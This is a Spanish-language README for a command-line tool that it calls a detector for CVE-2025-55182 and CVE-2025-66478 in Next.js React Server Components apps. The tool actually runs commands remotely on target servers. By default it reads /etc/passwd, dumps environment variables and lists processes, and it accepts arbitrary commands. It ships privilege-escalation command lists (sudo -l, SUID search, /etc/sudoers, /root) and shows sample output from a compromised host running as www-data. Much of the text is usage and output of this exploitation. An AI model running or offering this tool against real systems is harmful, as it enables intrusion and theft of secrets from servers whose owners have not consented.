
Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components.
Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
Nota: Si no se proporcionan opciones de comando, se ejecutan los comandos predeterminados.
La herramienta ejecuta estos comandos por defecto:
cat /etc/os-release - Información del SOwhoami - Usuario actualpwd - Directorio de trabajo actualid - ID de usuario y gruposuname -a - Información del sistemahostname -I - Interfaces de redls -la - Listado de directorioscat /etc/passwd - Cuentas de usuarioenv - Variables de entornops aux - Procesos en ejecuciónLa herramienta reportgenerator genera automáticamente informes profesionales de divulgación de vulnerabilidades a partir de los resultados del escaneo.
# Crea un archivo con los dominios objetivo
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# Ejecuta el generador de informes
reportgenerator
| Parámetro | Descripción | Predeterminado |
|---|---|---|
--file | Archivo de entrada que contiene los dominios objetivo | subs.txt |
--user | Nombre del investigador para la sección de divulgación | Bhagirath Saxena |
# Usar configuración predeterminada (subs.txt, Bhagirath Saxena)
reportgenerator
# Usar archivo de destino personalizado
reportgenerator --file targets.txt
# Usar nombre de investigador personalizado
reportgenerator --user "John Doe"
# Usar ambas opciones personalizadas
reportgenerator --file my-targets.txt --user "Jane Smith"
Los informes se generan en dos directorios:
textfile/ - Salida de escaneo sin procesar (numerados: 1.txt, 2.txt, etc.)mdfile/ - Informes profesionales en markdown (numerados: 1.md, 2.md, etc.)Nota: La función de numeración automática garantiza que los informes existentes nunca se sobrescriban. Los nuevos escaneos continúan desde el número más alto existente.
Cada informe generado incluye:
▼ 🎯 OBJETIVO: https://vulnerable-app.com
▼ 📋 COMANDOS A EJECUTAR: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Ejecutando: cat /etc/os-release
▼ 💻 INFORMACIÓN DEL SO
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Ejecutando: whoami
▼ 👤 USUARIO ACTUAL
║ www-data
...
[3/10] Ejecutando: pwd
▼ 📂 DIRECTORIO ACTUAL
║ /var/www/html
...
[6/10] Ejecutando: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Comando falló: hostname -I
║ Este comando podría no estar disponible o el servidor lo rechazó
╚════════════════════════════════════════════════════════════╝
[!] Intentando comando de red alternativo...
▼ 🌐 INTERFACES DE RED (alternativo)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/:Crea archivos de comandos de ejemplo para diferentes escenarios:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| Opción | Descripción | Predeterminado |
|---|
-d, --domain | URL objetivo (agrega https:// automáticamente si no tiene protocolo) | http://localhost:3000 |
-c, --command | Comando único a ejecutar | - |
-m, --multiple | Comandos múltiples separados por punto y coma | - |
-f, --file | Archivo que contiene comandos (uno por línea) | - |
-h, --help | Mostrar mensaje de ayuda | - |